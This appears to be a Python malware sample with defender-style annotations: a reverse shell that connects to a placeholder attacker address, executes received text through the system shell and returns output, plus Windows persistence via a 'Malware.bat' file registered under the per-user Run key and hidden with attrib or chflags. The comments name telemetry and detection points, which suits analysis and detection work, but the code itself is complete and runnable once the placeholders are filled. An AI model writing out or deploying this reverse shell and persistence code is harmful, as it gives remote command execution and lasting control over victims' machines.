# Analyst summary (defender's reading of this sample):
#   * connect()     - opens an outbound plain TCP socket and runs whatever text
#                     arrives on it through the system shell, returning output.
#   * persistence() - Windows only: drops a batch file under %APPDATA% and
#                     registers it under the per-user Run key.
#   * hide_file()   - marks the dropped file hidden via an OS utility.
# Observable artifacts visible in the code: the file name 'Malware.bat' in
# %APPDATA%, a Run-key value named 'Malware', and child processes 'attrib',
# 'chflags' and 'reg' spawned by a Python interpreter.
import subprocess
import socket
import os


def hide_file(file_path):
    """Set the "hidden" attribute on ``file_path`` using an OS utility.

    On ``os.name == 'nt'`` this runs ``attrib +h``; on ``os.name == 'posix'``
    it runs ``chflags hidden``. The exit status of the utility is not checked,
    so a failure is silent. Any other ``os.name`` value does nothing.
    """
    if os.name == 'nt':  # Windows OS
        # Process-creation telemetry will show attrib.exe with "+h" and the path.
        subprocess.call(['attrib', '+h', file_path])
    elif os.name == 'posix':  # Linux/Unix OS
        subprocess.call(['chflags', 'hidden', file_path])


def persistence():
    """Register the script to start at user logon (Windows only).

    Writes ``Malware.bat`` into the directory named by the ``APPDATA``
    environment variable, adds a ``REG_SZ`` value named ``Malware`` under the
    current user's ``...\\CurrentVersion\\Run`` key pointing at that batch
    file, then hides the batch file. On any non-``nt`` platform the function
    does nothing.
    """
    if os.name == 'nt':  # Windows OS
        # The batch file relaunches this script with pythonw.exe (no console window).
        with open(os.path.join(os.environ['APPDATA'], 'Malware.bat'), 'w') as bat_file:
            bat_file.write('START pythonw.exe {} & exit'.format(os.path.abspath(__file__)))
        # HKCU Run key needs no elevation; '/f' overwrites an existing value without
        # prompting. Registry-write auditing on this key is the usual place to catch it.
        subprocess.call(['reg', 'add', 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run', '/v', 'Malware', '/t', 'REG_SZ', '/d', os.path.join(os.environ['APPDATA'], 'Malware.bat'), '/f'])
        hide_file(os.path.join(os.environ['APPDATA'], 'Malware.bat'))


def connect():
    """Connect out to a remote host and execute the text it sends as commands.

    Loop behaviour, as written: ``exit`` ends the loop, ``persistence`` calls
    ``persistence()`` and replies with a fixed string, and every other message
    is passed to the system shell with its stdout and stderr sent back.
    The socket is a plain TCP stream: nothing here encrypts the traffic or
    authenticates the peer.
    """
    # Both values are placeholders as posted; no real endpoint appears on the page.
    attacker_ip = 'YOUR_ATTACKER_IP'
    attacker_port = YOUR_ATTACKER_PORT

    # Outbound connection initiated by the host running the script.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((attacker_ip, attacker_port))

    # Command loop: each recv() of up to 1024 bytes is treated as one command.
    while True:
        command = s.recv(1024).decode()
        if command.lower() == 'exit':
            break
        elif command.lower() == 'persistence':
            persistence()
            s.send('Persistence achieved!'.encode())
        else:
            # shell=True hands the received text to the system shell unmodified, so
            # the interpreter becomes the parent of a shell process - a parent/child
            # pair that endpoint monitoring can alert on.
            cmd_output = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            output_bytes = cmd_output.stdout.read() + cmd_output.stderr.read()
            # Undecodable bytes are dropped ('ignore') before the reply is sent.
            output_str = output_bytes.decode('utf-8', 'ignore')
            s.send(output_str.encode())

    # Close the connection
    s.close()


if __name__ == '__main__':
    connect()